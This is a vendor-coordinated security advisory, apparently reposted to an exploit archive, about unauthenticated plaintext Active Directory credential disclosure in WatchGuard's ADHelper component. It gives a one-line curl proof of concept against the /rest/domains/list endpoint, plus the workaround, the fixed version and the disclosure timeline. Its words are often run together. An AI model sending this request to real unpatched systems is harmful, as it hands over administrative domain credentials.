# Exploit:WatchGuardFirewareADHelperComponent5.8.5.10317-CredentialDisclosure
# Author:RedTeamPentestingGmbH
# Date:2020-03-11
# Vendor: https://www.watchguard.com
# Software link: https://www.watchguard.com/help/docs/help-center/en-US/Content/en-US/Fireware/services/tdr/tdr_ad_helper_c.html
# CVE:N/AAdvisory:CredentialDisclosure in WatchGuardFirewareADHelperComponentRedTeamPentesting discovered a credential-disclosure vulnerability in
the ADHelper component of the WatchGuardFirewareThreatDetection and
Response(TDR) service, which allows unauthenticated attackers togainActiveDirectory credentials for a Windows domain in plaintext.
Details=======Product:WatchGuardFirewareADHelperComponentAffectedVersions:5.8.5.10233,<5.8.5.10317FixedVersions:5.8.5.10317VulnerabilityType:InformationDisclosureSecurityRisk: high
VendorURL: https://www.watchguard.com/help/docs/help-center/en-US/Content/en-US/Fireware/services/tdr/tdr_ad_helper_c.html
VendorStatus: fixed version released
AdvisoryURL: https://www.redteam-pentesting.de/advisories/rt-sa-2020-001AdvisoryStatus: published
CVE:GENERIC-MAP-NOMATCHCVEURL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCHIntroduction============
"ThreatDetection and Response(TDR) is a cloud-based subscription
service that integrates withyourFireboxtominimize the consequences
of data breaches and penetrations through early detection and automated
remediation of security threats."
"ThreatDetection and Response includes the ADHelpercomponent. If your
network has an ActiveDirectory server, you can install ADHelpertomanage automated installation and updates of HostSensors on your
network."
(from the vendor's homepage)MoreDetails============By accessing the ADHelper's web interface, it was discovered that a
call toanAPI endpoint is made, which responds withplaintext
credentials toall configured domain controllers. There is no
authentication needed touse the described interface and the
installation instructions at [1] contain no indication of any way toconfigure access control.
Proof of Concept================AnHTTPGET request tothe path "/domains/list" of the ADHelperAPI returns, among others, the plaintext credentials toall configured Windows domain controllers:------------------------------------------------------------------------
$ curl --silent "http://adhelper.example.com:8080/rest/domains/list?sortCol=fullyQualifiedName&sortDir=asc"| jq .{"content":[{"id":1,"fullyQualifiedName":"example.com","logonDomain":"example.com","domainControllers":"dc1.example.com","username":"[DOMAIN_USER]","password":"[DOMAIN_PASSWORD]","uuid":"[...]","servers":[{[...]}]}],"totalPages":1,"totalElements":1,"number":0,"numberOfElements":1}------------------------------------------------------------------------The same request and its response can be observed when initially accessing
the web interface. The discovered version of ADHelper responds withthe following server banner:------------------------------------------------------------------------jetty(winstone-5.8.5.10233-9.4.12.v20180830)------------------------------------------------------------------------It is likely that other versions of the ADHelperComponent are
vulnerable as well.
Workaround==========EnsureAPI of the ADHelperComponent is not reachable over the network,for example by putting it behind a Firewall.
Fix===UpdatetoVersion5.8.5.10317 or later.
SecurityRisk=============No authentication is needed toaccessADHelper's web interface and the
installation instructions at [1] describe that configured domain user
accounts must possess at least the following privileges:*Connecttothe host
*Mount the share ADMIN$
*Create a file on the host
*Execute commands on the host
*Install software on the host
Accesstothe"ADMIN$" share implies a user withadministrativeprivileges. Therefore,this vulnerability poses a high risk.
Timeline========2020-02-12Vulnerability identified
2020-02-19Customer approved disclosure tovendor2020-02-24Triedtocontact the German branch of WatchGuard2020-02-27Contacted the Dutch branch of WatchGuard2020-02-28ContacttoADHelperQATeamLead established
2020-03-02Advisory draft sent for verification
2020-03-10Vendor released fixed version and blog post
2020-03-11CVEID requested
2020-03-11Advisory released
References==========[1] https://www.watchguard.com/help/docs/help-center/en-US/Content/en-US/Fireware/services/tdr/tdr_ad_helper_c.html
RedTeamPentestingGmbH=======================RedTeamPentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.
As there are only few experts in this field,RedTeamPentesting wants toshare its knowledge and enhance the public knowledge withresearch in
security-related areas. The results are made available as public
security advisories.
More information about RedTeamPentesting can be found at:
https://www.redteam-pentesting.de/